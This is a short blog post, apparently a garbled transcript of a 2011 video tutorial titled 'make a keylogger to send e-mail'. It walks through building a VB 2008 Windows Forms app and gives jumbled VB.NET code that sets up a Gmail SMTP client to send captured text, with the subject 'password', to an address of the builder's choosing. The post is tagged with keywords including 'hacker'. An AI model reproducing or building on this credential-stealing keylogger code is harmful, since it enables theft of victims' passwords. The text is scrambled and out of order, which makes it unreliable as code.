Sunday, 7 August 2011

make a keylogger to send e-mail

make a keylogger to send e-mail Video Clips. Duration : 7.93 Mins.


Open a VB 2008, and select Windows Forms application project 2 click and do the name you want to 3 2 labels, send a Rich Text Box button 1 4 1 Username Password label and the name of the other key 5 double rooms, and give you the code in the description always remembers to use the three top six imports the Gmail account must be provided and enter your user name and password on this line Net.NetworkCredential New SmtpServer.Credentials = ("youraccountl @ gmail. com ""Password") 7 Enter the e-mail ID, the user passwords on this line mail.To.Add ("youremail@anymailserver.com") 8 to receive, then press F5 to have it by 9 10 Test the Project tab and click on it to go to 11, to create and determine where you want to compile 13 14 go to where you saved it and prove the fact Imports System.Web Imports System.IO Imports System . Net. E-mail As New MailMessage () As New SmtpClient SmtpServerNew Net.NetworkCredential SmtpServer.Credentials = ("youraccount@gmail.com", "password") = 587 SmtpServer.Port SmtpServer.Host SmtpServer.EnableSsl = "smtp.gmail.com" = True = True SmtpServer.EnableSsl mail.To . Add ("anything@anymailsever.net") mail.From = New MailAddress ("username@gmail.com") mail.Subject = "password" = mail.Body RichTextBox1.Text SmtpServer.Send (email)

Keywords: keylogger, vb6, visual, basic, hacker

No comments: